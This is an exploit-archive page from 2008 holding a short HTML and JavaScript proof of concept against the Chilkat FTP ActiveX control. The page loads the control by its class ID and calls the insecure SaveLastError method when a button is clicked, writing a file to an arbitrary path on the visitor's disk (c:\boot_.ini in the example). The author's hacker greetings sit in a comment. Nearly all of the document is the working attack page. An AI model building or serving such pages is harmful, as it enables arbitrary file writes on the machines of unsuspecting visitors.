[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Chilkat FTP ActiveX (SaveLastError) Insecure Method Exploit
# Published : 2008-12-28
# Author : callAX
# Previous Title : Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit (vista)
# Next Title : Google Chrome Browser (ChromeHTML://) Remote Parameter Injection
<html>
<title>ChilkatSocket.DLL Arbitrary File Creation ChilkatFTP.dll v3.0.0.2</title><br><br>
<body>
<h3>ChilkatSocket.DLL Arbitrary File Creation ChilkatFTP.dll v3.0.0.2 Arbitrary Data Write Exploit</h3>
<!c0d3d by callAX
*-*-*-*-*
0wN thE b0x p4l
*_*-*_*_*
Greetings to str0ke and Fr0git0-->
<HTML>
<BODY>
<object id=ctrl classid="clsid:{3B598BD0-AF50-48C6-B6A5-63261A48B054}"></object>
<SCRIPT>
function Do_it()
{
File = "c:\boot_.ini"
ctrl.SaveLastError(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="S3nd me to thls HD">
</body>
</HTML>
# www.Syue.com [2008-12-28]